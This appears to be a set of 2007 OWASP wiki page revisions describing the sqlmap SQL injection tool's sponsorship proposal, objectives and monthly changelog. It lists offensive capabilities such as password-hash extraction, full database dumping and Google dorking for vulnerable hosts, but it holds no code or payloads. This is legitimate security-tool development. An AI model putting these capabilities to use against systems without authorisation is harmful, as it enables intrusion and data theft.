=== Objectives for OWASP Spring of Code 2007 ===

* Add support for Oracle database management system
* Add support to extract database users password hash
* Extend inband SQL injection functionality to all other possible queries
* Add Microsoft SQL Server database fingerprint
* Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers
* Add support for query ETA (Estimated Time of Arrival) real time calculation
* Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* Improve logging functionality

'''NOTE''': All objectives have been acoomplished within the deadline ([http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007#Schedule 5th of November 2007]), check the [http://www.owasp.org/index.php/SpoC_007_-_SQLMap_-_Progress_Page Progress Page] for details.

=== Long-term vision for the project ===

Make sqlmap available as an easy-to-use enumeration and penetration testing tool to the OWASP community extending its functionality to exploit SQL injection vulnerabilities to provide a remote shell on the affected web application database server when possible. In the long run I would also like to develop a graphical user interface.

=== Why I should be sponsored for the project ===

I have good python programming skills and some years of experience in computer networks security. I spent most of the last year researching on web application insecurity taking over the [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap development] since December 2006. Actually I work as software developer at an information security company in Italy where I mostly deal with vulnerability assessment.

=== Links ===

* [http://sqlmap.sourceforge.net sqlmap homepage]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap SVN repository web interface]
* [https://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107 sqlmap SourceForge File List page]
* [http://sqlmap.sourceforge.net/dev/index.html sqlmap development documentation]

'''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

SpoC 007 - SqlMap

2007-11-04T20:49:32Z

Inquis:

''''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

'''AoC Candidate''': Bernardo Damele

'''Project coordinator''': Dinis Cruz

'''Project Progress''': '''100%''' Complete, [[SpoC 007 - SQLMap - Progress Page|Progress Page]]

== Bernardo Damele - SQLMap ==

=== Executive Summary ===

[http://sqlmap.sourceforge.net sqlmap] is an automatic SQL injection tool entirely developed in [http://www.python.org Python]. It is capable to perform an extensive database management system back-end fingerprint, retrieve remote DBMS databases, usernames, tables, columns, enumerate entire DBMS, read system files and much more taking advantage of web application programming security flaws that lead to SQL injection vulnerabilities.

=== Objectives for OWASP Spring of Code 2007 ===

* Add support for Oracle database management system
* Add support to extract database users password hash
* Extend inband SQL injection functionality to all other possible queries
* Add Microsoft SQL Server database fingerprint
* Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers
* Add support for query ETA (Estimated Time of Arrival) real time calculation
* Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* Improve logging functionality

=== Long-term vision for the project ===

Make sqlmap available as an easy-to-use enumeration and penetration testing tool to the OWASP community extending its functionality to exploit SQL injection vulnerabilities to provide a remote shell on the affected web application database server when possible. In the long run I would also like to develop a graphical user interface.

=== Why I should be sponsored for the project ===

I have good python programming skills and some years of experience in computer networks security. I spent most of the last year researching on web application insecurity taking over the [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap development] since December 2006. Actually I work as software developer at an information security company in Italy where I mostly deal with vulnerability assessment.

=== Links ===

* [http://sqlmap.sourceforge.net sqlmap homepage]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap SVN repository web interface]
* [https://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107 sqlmap SourceForge File List page]
* [http://sqlmap.sourceforge.net/dev/index.html sqlmap development documentation]

'''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

SpoC 007 - SQLMap - Progress Page

2007-11-04T20:49:29Z

Inquis:

== Accomplished objectives for OWASP Spring of Code 2007 ==

* '''[100%]''' Add support for Oracle database management system
* '''[100%]''' Add support to extract database users password hash
* '''[100%]''' Extend inband SQL injection functionality to all other possible queries
* '''[100%]''' Add Microsoft SQL Server database fingerprint
* '''[100%]''' Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* '''[100%]''' Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers
* '''[100%]''' Add support for query ETA (Estimated Time of Arrival) real time calculation
* '''[100%]''' Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[100%]''' Improve logging functionality

== Changes in sqlmap during OWASP Spring of Code 2007 ==

=== May 2007 ===

* '''[SpoC]''' Added support to extract database users password hash on MySQL and PostgreSQL
* '''[SpoC]''' Improved Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[SpoC]''' Added support for query ETA (Estimated Time of Arrival) real time calculation (''--eta'')
* '''[SpoC]''' Added Microsoft SQL Server extensive DBMS fingerprint checks based upon extensive infogathering on ''@@version'' matching on an XML file to get also the exact patching level of the DBMS
* '''[SpoC]''' Improved logging functionality: passed from banal ''print'' to Python native logging library
* Added DBMS fingerprint based also upon HTML error messages parsing by a ''xml.sax'' function/class (defined in ''lib/parser.py'') which read an XML file defining default error messages for each supported DBMS
* Added the possibility to specify ''mssql'', ''pgsql'' as ''--remote-dbms'' values

=== June 2007 ===

* '''[SpoC]''' Improved UNION SELECT check so now it works with five different DBMS because it uses the ''xml/errors.xml'' file to recognize HTML error messages and correctly identify if the inband SQL injection performed provided good results or not
* Updated documentation
* Layout fixes

=== July 2007 ===

* '''[SpoC]''' Extended inband SQL injection functionality (''--union-use'') to all other possible queries since it only worked with ''-e'' and ''--file'' on all DMBS plugins
* '''[SpoC]''' Added a fuzzer function with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting (''txt/fuzz_vectors.txt'', ''Common.passiveFuzzing()'', ''lib/settings.py'' and DBMS plugins)
* '''[SpoC]''' Reviewed HTTP request library (''lib/request.py'') to support the extended inband SQL injection functionality. Splitted ''getValue()'' into ''getInband()'' and ''getBlind()''
* '''[SpoC]''' Major enhancements in common library and added ''checkForBrackets()'' method to check if the bracket(s) are needed to perform a UNION query SQL injection attack
* Implemented ''--dump-all'' functionality to dump entire DBMS data from all databases tables
* Imlemented in ''Dump.dbTableValues()'' method the CSV file dumped data automatic saving in ''csv/'' folder by default
* Added DB2, Informix and Sybase DBMS error messages and minor improvements in ''xml/errors.xml''
* Renamed DMBS plugins

=== September 2007 ===

* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/column are specified to be dumped. Some more minor fixes in all three DBMS plugins
* Important fixes in ''lib/option.py'' to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function ''__setCSVDir()'' and fixed also in ''lib/dump.py''
* Minor enhancement in ''lib/injection.py'' to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (''q'') the for cycle when using the google dork option (''-g'')
* Minor fix in ''lib/request.py'' to properly encode the url to request in case the "fixed" part of the url has blank spaces
* More minor layout enhancements in some libraries
* Updated ChangeLog and TODO documentation files

=== October 2007 ===

* '''[SpoC]''' Added support for Oracle database management system
* '''[SpoC]''' Added support to extract database users password hash on Microsoft SQL Server
* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries, ''--exclude-sysdbs''
* Major code refactoring: strongly slightned and adapted plugins code and DBMS strictly specific methods, centralized the queries method to ''lib/query.php'' and the queries to an XML file, ''xml/queries.xml'', implemented a function and a class to parse such XML file, renamed a lot of functions and variables to let the name be more self explained
* Minor fix in other libraries to avoid ''extra'' parameter when calling ''UnionUse.unionUse()''
* Enhancement in plugins so the column type is not more enumerated when it's not necessary to dump table entries, since we need to know in this case only the column name
* Major fix in plugins and in ''lib/dump.py'' to sort both column names and entries when dumping table entries
* Major fix in plugins to correctly handle the ''-C'' command line argument to dump table values from
* Code refactoring in ''lib/request.py'' ''getInband()'' method
* Major code review and restyling in plugins
* Minor layout improvement in ''lib/resume.py''
* Minor fix in ''getValue()'' call in plugins
* Minor fix in ''lib/option.py'' to correctly handle one-line User-Agent file
* Added ''__cleanupParameters()'' method in ''lib/option.py''
* Some enhancement in ''lib/dump.py'' to correctly handle also the ''-e'' command line argument
* Updated all documentation files, mainly README ([http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/README.html HTML] and [http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/README.pdf PDF])

=== November 2007 ===

* '''[SpoC]''' Added support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers
* Added ''lib/smdict.py'' with ''sqlmapDict'' object definition used as the "knowledge base" for ''self.args'' and for queries object
* Added ''Common.getDocRoot()'' and ''Common.getDirectories()'' functions for further development ;)
* Added ''Common.setDbms()'' function to be used by plugin modules to set ''self.args.fingerprint'' and save remote DBMS value in log file
* Added Oracle DBMS 11i detection in Oracle plugin
* Updated documentation files
* Complete code refactoring and cleanup
* sqlmap 0.5 is out with all SpoC objectives accomplished and a lot of enhancements implemented too

== Links ==

* [http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/ChangeLog sqlmap ChangeLog]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap?view=rev sqlmap last SVN revision log message]

SpoC 007 - SQLMap - Progress Page

2007-10-23T15:58:10Z

Inquis:

== Objectives for OWASP Spring of Code 2007 ==

=== Accomplished objectives at 23rd of October 2007 ===

* '''[100%]''' Add support for Oracle database management system
* '''[100%]''' Add support to extract database users password hash
* '''[100%]''' Extend inband SQL injection functionality to all other possible queries
* '''[100%]''' Add Microsoft SQL Server database fingerprint
* '''[100%]''' Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* '''[100%]''' Add support for query ETA (Estimated Time of Arrival) real time calculation
* '''[100%]''' Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[100%]''' Improve logging functionality

=== Ongoing work at 23rd of October 2007 ===

* '''[0%]''' Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers

== Changes in sqlmap during OWASP Spring of Code 2007 ==

=== May 2007 ===

* '''[SpoC]''' Added support to extract database users password hash on MySQL and PostgreSQL
* '''[SpoC]''' Improved Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[SpoC]''' Added support for query ETA (Estimated Time of Arrival) real time calculation (''--eta'')
* '''[SpoC]''' Added Microsoft SQL Server extensive DBMS fingerprint checks based upon extensive infogathering on ''@@version'' matching on an XML file to get also the exact patching level of the DBMS
* '''[SpoC]''' Improved logging functionality: passed from banal ''print'' to Python native logging library
* Added DBMS fingerprint based also upon HTML error messages parsing by a ''xml.sax'' function/class (defined in ''lib/parser.py'') which read an XML file defining default error messages for each supported DBMS
* Added the possibility to specify ''mssql'', ''pgsql'' as ''--remote-dbms'' values

=== June 2007 ===

* '''[SpoC]''' Improved UNION SELECT check so now it works with five different DBMS because it uses the ''xml/errors.xml'' file to recognize HTML error messages and correctly identify if the inband SQL injection performed provided good results or not
* Updated documentation
* Layout fixes

=== July 2007 ===

* '''[SpoC]''' Extended inband SQL injection functionality (''--union-use'') to all other possible queries since it only worked with ''-e'' and ''--file'' on all DMBS plugins
* '''[SpoC]''' Added a fuzzer function with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting (''txt/fuzz_vectors.txt'', ''Common.passiveFuzzing()'', ''lib/settings.py'' and DBMS plugins)
* '''[SpoC]''' Reviewed HTTP request library (''lib/request.py'') to support the extended inband SQL injection functionality. Splitted ''getValue()'' into ''getInband()'' and ''getBlind()''
* '''[SpoC]''' Major enhancements in common library and added ''checkForBrackets()'' method to check if the bracket(s) are needed to perform a UNION query SQL injection attack
* Implemented ''--dump-all'' functionality to dump entire DBMS data from all databases tables
* Imlemented in ''Dump.dbTableValues()'' method the CSV file dumped data automatic saving in ''csv/'' folder by default
* Added DB2, Informix and Sybase DBMS error messages and minor improvements in ''xml/errors.xml''
* Renamed DMBS plugins

=== September 2007 ===

* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/column are specified to be dumped. Some more minor fixes in all three DBMS plugins
* Important fixes in ''lib/option.py'' to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function ''__setCSVDir()'' and fixed also in ''lib/dump.py''
* Minor enhancement in ''lib/injection.py'' to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (''q'') the for cycle when using the google dork option (''-g'')
* Minor fix in ''lib/request.py'' to properly encode the url to request in case the "fixed" part of the url has blank spaces
* More minor layout enhancements in some libraries
* Updated ChangeLog and TODO documentation files

=== October 2007 ===

* '''[SpoC]''' Added support for Oracle database management system
* '''[SpoC]''' Added support to extract database users password hash on Microsoft SQL Server
* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries, ''--exclude-sysdbs''
* Major code refactoring: strongly slightned and adapted plugins code and DBMS strictly specific methods, centralized the queries method to ''lib/query.php'' and the queries to an XML file, ''xml/queries.xml'', implemented a function and a class to parse such XML file, renamed a lot of functions and variables to let the name be more self explained
* Minor fix in other libraries to avoid ''extra'' parameter when calling ''UnionUse.unionUse()''
* Enhancement in plugins so the column type is not more enumerated when it's not necessary to dump table entries, since we need to know in this case only the column name
* Major fix in plugins and in ''lib/dump.py'' to sort both column names and entries when dumping table entries
* Major fix in plugins to correctly handle the ''-C'' command line argument to dump table values from
* Code refactoring in ''lib/request.py'' ''getInband()'' method
* Major code review and restyling in plugins
* Minor layout improvement in ''lib/resume.py''
* Minor fix in ''getValue()'' call in plugins
* Minor fix in ''lib/option.py'' to correctly handle one-line User-Agent file
* Added ''__cleanupParameters()'' method in ''lib/option.py''
* Some enhancement in ''lib/dump.py'' to correctly handle also the ''-e'' command line argument
* Updated all documentation files, mainly README ([http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/README.html HTML] and [http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/README.pdf PDF])

== Links ==

* [http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/ChangeLog sqlmap ChangeLog]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap?view=rev sqlmap last SVN revision log message]

SpoC 007 - SQLMap - Progress Page

2007-10-23T15:55:25Z

Inquis:

== Objectives for OWASP Spring of Code 2007 ==

=== Accomplished objectives at 23rd of October 2007 ===

* '''[100%]''' Add support for Oracle database management system
* '''[100%]''' Add support to extract database users password hash
* '''[100%]''' Extend inband SQL injection functionality to all other possible queries
* '''[100%]''' Add Microsoft SQL Server database fingerprint
* '''[100%]''' Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* '''[100%]''' Add support for query ETA (Estimated Time of Arrival) real time calculation
* '''[100%]''' Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[100%]''' Improve logging functionality

=== Ongoing work at 23rd of October 2007 ===

* '''[0%]''' Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers

== Changes in sqlmap during OWASP Spring of Code 2007 ==

=== May 2007 ===

* '''[SpoC]''' Added support to extract database users password hash on MySQL and PostgreSQL
* '''[SpoC]''' Improved Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[SpoC]''' Added support for query ETA (Estimated Time of Arrival) real time calculation (''--eta'')
* '''[SpoC]''' Added Microsoft SQL Server extensive DBMS fingerprint checks based upon extensive infogathering on ''@@version'' matching on an XML file to get also the exact patching level of the DBMS
* '''[SpoC]''' Improved logging functionality: passed from banal ''print'' to Python native logging library
* Added DBMS fingerprint based also upon HTML error messages parsing by a ''xml.sax'' function/class (defined in ''lib/parser.py'') which read an XML file defining default error messages for each supported DBMS
* Added the possibility to specify ''mssql'', ''pgsql'' as ''--remote-dbms'' values

=== June 2007 ===

* '''[SpoC]''' Improved UNION SELECT check so now it works with five different DBMS because it uses the ''xml/errors.xml'' file to recognize HTML error messages and correctly identify if the inband SQL injection performed provided good results or not
* Updated documentation
* Layout fixes

=== July 2007 ===

* '''[SpoC]''' Extended inband SQL injection functionality (''--union-use'') to all other possible queries since it only worked with ''-e'' and ''--file'' on all DMBS plugins
* '''[SpoC]''' Added a fuzzer function with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting (''txt/fuzz_vectors.txt'', ''Common.passiveFuzzing()'', ''lib/settings.py'' and DBMS plugins)
* '''[SpoC]''' Reviewed HTTP request library (''lib/request.py'') to support the extended inband SQL injection functionality. Splitted ''getValue()'' into ''getInband()'' and ''getBlind()''
* '''[SpoC]''' Major enhancements in common library and added ''checkForBrackets()'' method to check if the bracket(s) are needed to perform a UNION query SQL injection attack
* Implemented ''--dump-all'' functionality to dump entire DBMS data from all databases tables
* Imlemented in ''Dump.dbTableValues()'' method the CSV file dumped data automatic saving in ''csv/'' folder by default
* Added DB2, Informix and Sybase DBMS error messages and minor improvements in ''xml/errors.xml''
* Renamed DMBS plugins

=== September 2007 ===

* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/column are specified to be dumped. Some more minor fixes in all three DBMS plugins
* Important fixes in ''lib/option.py'' to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function ''__setCSVDir()'' and fixed also in ''lib/dump.py''
* Minor enhancement in ''lib/injection.py'' to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (''q'') the for cycle when using the google dork option (''-g'')
* Minor fix in ''lib/request.py'' to properly encode the url to request in case the "fixed" part of the url has blank spaces
* More minor layout enhancements in some libraries
* Updated ChangeLog and TODO documentation files

=== October 2007 ===

* '''[SpoC]''' Add support for Oracle database management system
* '''[SpoC]''' Added support to extract database users password hash on Microsoft SQL Server
* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries, ''--exclude-sysdbs''
* Major code refactoring: strongly slightned and adapted plugins code and DBMS strictly specific methods, centralized the queries method to ''lib/query.php'' and the queries to an XML file, ''xml/queries.xml'', implemented a function and a class to parse such XML file, renamed a lot of functions and variables to let the name be more self explained
* Minor fix in other libraries to avoid ''extra'' parameter when calling ''UnionUse.unionUse()''
* Enhancement in plugins so the column type is not more enumerated when it's not necessary to dump table entries, since we need to know in this case only the column name
* Major fix in plugins and in ''lib/dump.py'' to sort both column names and entries when dumping table entries
* Major fix in plugins to correctly handle the ''-C'' command line argument to dump table values from
* Code refactoring in ''lib/request.py'' ''getInband()'' method
* Major code review and restyling in plugins
* Minor layout improvement in ''lib/resume.py''
* Minor fix in ''getValue()'' call in plugins
* Minor fix in ''lib/option.py'' to correctly handle one-line User-Agent file
* Added ''__cleanupParameters()'' method in ''lib/option.py''
* Some enhancement in ''lib/dump.py'' to correctly handle also the ''-e'' command line argument
* Updated all documentation files, mainly README ([http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/README.html HTML] and [http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/README.pdf PDF])

== Links ==

* [http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/ChangeLog sqlmap ChangeLog]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap?view=rev sqlmap last SVN revision log message]

SpoC 007 - SqlMap

2007-10-23T15:53:53Z

Inquis:

''''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

'''AoC Candidate''': Bernardo Damele

'''Project coordinator''': Dinis Cruz

'''Project Progress''': 90% Complete, [[SpoC 007 - SQLMap - Progress Page|Progress Page]]

== Bernardo Damele - SQLMap ==

=== Executive Summary ===

[http://sqlmap.sourceforge.net sqlmap] is an automatic SQL injection tool entirely developed in [http://www.python.org Python]. It is capable to perform an extensive database management system back-end fingerprint, retrieve remote DBMS databases, usernames, tables, columns, enumerate entire DBMS, read system files and much more taking advantage of web application programming security flaws that lead to SQL injection vulnerabilities.

=== Objectives for OWASP Spring of Code 2007 ===

* Add support for Oracle database management system
* Add support to extract database users password hash
* Extend inband SQL injection functionality to all other possible queries
* Add Microsoft SQL Server database fingerprint
* Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers
* Add support for query ETA (Estimated Time of Arrival) real time calculation
* Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* Improve logging functionality

=== Long-term vision for the project ===

Make sqlmap available as an easy-to-use enumeration and penetration testing tool to the OWASP community extending its functionality to exploit SQL injection vulnerabilities to provide a remote shell on the affected web application database server when possible. In the long run I would also like to develop a graphical user interface.

=== Why I should be sponsored for the project ===

I have good python programming skills and some years of experience in computer networks security. I spent most of the last year researching on web application insecurity taking over the [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap development] since December 2006. Actually I work as software developer at an information security company in Italy where I mostly deal with vulnerability assessment.

=== Links ===

* [http://sqlmap.sourceforge.net sqlmap homepage]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap SVN repository web interface]
* [https://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107 sqlmap SourceForge File List page]
* [http://sqlmap.sourceforge.net/dev/index.html sqlmap development documentation]

'''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

SpoC 007 - SQLMap - Progress Page

2007-10-22T10:36:31Z

Inquis:

== Objectives for OWASP Spring of Code 2007 ==

=== Accomplished objectives at 11st of October 2007 ===

* '''[100%]''' Add support to extract database users password hash
* '''[100%]''' Extend inband SQL injection functionality to all other possible queries
* '''[100%]''' Add Microsoft SQL Server database fingerprint
* '''[100%]''' Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* '''[100%]''' Add support for query ETA (Estimated Time of Arrival) real time calculation
* '''[100%]''' Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[100%]''' Improve logging functionality

=== Ongoing work at 11st of October 2007 ===

* '''[50%]''' Add support for Oracle database management system
* '''[0%]''' Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers

== Changes in sqlmap during OWASP Spring of Code 2007 ==

=== May 2007 ===

* '''[SpoC]''' Added support to extract database users password hash on MySQL and PostgreSQL
* '''[SpoC]''' Improved Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[SpoC]''' Added support for query ETA (Estimated Time of Arrival) real time calculation (''--eta'')
* '''[SpoC]''' Added Microsoft SQL Server extensive DBMS fingerprint checks based upon extensive infogathering on ''@@version'' matching on an XML file to get also the exact patching level of the DBMS
* '''[SpoC]''' Improved logging functionality: passed from banal ''print'' to Python native logging library
* Added DBMS fingerprint based also upon HTML error messages parsing by a ''xml.sax'' function/class (defined in ''lib/parser.py'') which read an XML file defining default error messages for each supported DBMS
* Added the possibility to specify ''mssql'', ''pgsql'' as ''--remote-dbms'' values

=== June 2007 ===

* '''[SpoC]''' Improved UNION SELECT check so now it works with five different DBMS because it uses the ''xml/errors.xml'' file to recognize HTML error messages and correctly identify if the inband SQL injection performed provided good results or not
* Updated documentation
* Layout fixes

=== July 2007 ===

* '''[SpoC]''' Extended inband SQL injection functionality (''--union-use'') to all other possible queries since it only worked with ''-e'' and ''--file'' on all DMBS plugins
* '''[SpoC]''' Added a fuzzer function with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting (''txt/fuzz_vectors.txt'', ''Common.passiveFuzzing()'', ''lib/settings.py'' and DBMS plugins)
* '''[SpoC]''' Reviewed HTTP request library (''lib/request.py'') to support the extended inband SQL injection functionality. Splitted ''getValue()'' into ''getInband()'' and ''getBlind()''
* '''[SpoC]''' Major enhancements in common library and added ''checkForBrackets()'' method to check if the bracket(s) are needed to perform a UNION query SQL injection attack
* Implemented ''--dump-all'' functionality to dump entire DBMS data from all databases tables
* Imlemented in ''Dump.dbTableValues()'' method the CSV file dumped data automatic saving in ''csv/'' folder by default
* Added DB2, Informix and Sybase DBMS error messages and minor improvements in ''xml/errors.xml''
* Renamed DMBS plugins

=== September 2007 ===

* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/column are specified to be dumped. Some more minor fixes in all three DBMS plugins
* Important fixes in ''lib/option.py'' to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function ''__setCSVDir()'' and fixed also in ''lib/dump.py''
* Minor enhancement in ''lib/injection.py'' to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (''q'') the for cycle when using the google dork option (''-g'')
* Minor fix in ''lib/request.py'' to properly encode the url to request in case the "fixed" part of the url has blank spaces
* More minor layout enhancements in some libraries
* Updated ChangeLog and TODO documentation files

=== October 2007 ===

* '''[SpoC]''' Added support to extract database users password hash on Microsoft SQL Server
* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries, ''--exclude-sysdbs''
* Major code refactoring: strongly slightned and adapted plugins code and DBMS strictly specific methods, centralized the queries method to ''lib/query.php'' and the queries to an XML file, ''xml/queries.xml'', implemented a function and a class to parse such XML file, renamed a lot of functions and variables to let the name be more self explained
* Minor fix in other libraries to avoid ''extra'' parameter when calling ''UnionUse.unionUse()''
* Enhancement in plugins so the column type is not more enumerated when it's not necessary to dump table entries, since we need to know in this case only the column name
* Major fix in plugins and in ''lib/dump.py'' to sort both column names and entries when dumping table entries
* Major fix in plugins to correctly handle the ''-C'' command line argument to dump table values from
* Code refactoring in ''lib/request.py'' ''getInband()'' method
* Major code review and restyling in plugins
* Minor layout improvement in ''lib/resume.py''
* Minor fix in ''getValue()'' call in plugins
* Minor fix in ''lib/option.py'' to correctly handle one-line User-Agent file
* Added ''__cleanupParameters()'' method in ''lib/option.py''
* Some enhancement in ''lib/dump.py'' to correctly handle also the ''-e'' command line argument
* Updated all documentation files, mainly README ([http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/README.html HTML] and [http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/README.pdf PDF])

== Links ==

* [http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/ChangeLog sqlmap ChangeLog]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap?view=rev sqlmap last SVN revision log message]

SpoC 007 - SqlMap

2007-10-22T08:31:18Z

Inquis:

''''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

'''AoC Candidate''': Bernardo Damele

'''Project coordinator''': Dinis Cruz

'''Project Progress''': 80% Complete, [[SpoC 007 - SQLMap - Progress Page|Progress Page]]

== Bernardo Damele - SQLMap ==

=== Executive Summary ===

[http://sqlmap.sourceforge.net sqlmap] is an automatic SQL injection tool entirely developed in [http://www.python.org Python]. It is capable to perform an extensive database management system back-end fingerprint, retrieve remote DBMS databases, usernames, tables, columns, enumerate entire DBMS, read system files and much more taking advantage of web application programming security flaws that lead to SQL injection vulnerabilities.

=== Objectives for OWASP Spring of Code 2007 ===

* Add support for Oracle database management system
* Add support to extract database users password hash
* Extend inband SQL injection functionality to all other possible queries
* Add Microsoft SQL Server database fingerprint
* Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers
* Add support for query ETA (Estimated Time of Arrival) real time calculation
* Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* Improve logging functionality

=== Long-term vision for the project ===

Make sqlmap available as an easy-to-use enumeration and penetration testing tool to the OWASP community extending its functionality to exploit SQL injection vulnerabilities to provide a remote shell on the affected web application database server when possible. In the long run I would also like to develop a graphical user interface.

=== Why I should be sponsored for the project ===

I have good python programming skills and some years of experience in computer networks security. I spent most of the last year researching on web application insecurity taking over the [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap development] since December 2006. Actually I work as software developer at an information security company in Italy where I mostly deal with vulnerability assessment.

=== Links ===

* [http://sqlmap.sourceforge.net sqlmap homepage]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap SVN repository web interface]
* [https://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107 sqlmap SourceForge File List page]
* [http://sqlmap.sourceforge.net/dev/index.html sqlmap development documentation]

'''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

SpoC 007 - SQLMap - Progress Page

2007-10-13T23:23:38Z

Inquis:

== Objectives for OWASP Spring of Code 2007 ==

=== Accomplished objectives at 11st of October 2007 ===

* '''[100%]''' Add support to extract database users password hash
* '''[100%]''' Extend inband SQL injection functionality to all other possible queries
* '''[100%]''' Add Microsoft SQL Server database fingerprint
* '''[100%]''' Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* '''[100%]''' Add support for query ETA (Estimated Time of Arrival) real time calculation
* '''[100%]''' Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[100%]''' Improve logging functionality

=== Ongoing work at 11st of October 2007 ===

* '''[50%]''' Add support for Oracle database management system
* '''[0%]''' Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers

== Changes in sqlmap during OWASP Spring of Code 2007 ==

=== May 2007 ===

* '''[SpoC]''' Added support to extract database users password hash on MySQL and PostgreSQL
* '''[SpoC]''' Improved Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[SpoC]''' Added support for query ETA (Estimated Time of Arrival) real time calculation (''--eta'')
* '''[SpoC]''' Added Microsoft SQL Server extensive DBMS fingerprint checks based upon extensive infogathering on ''@@version'' matching on an XML file to get also the exact patching level of the DBMS
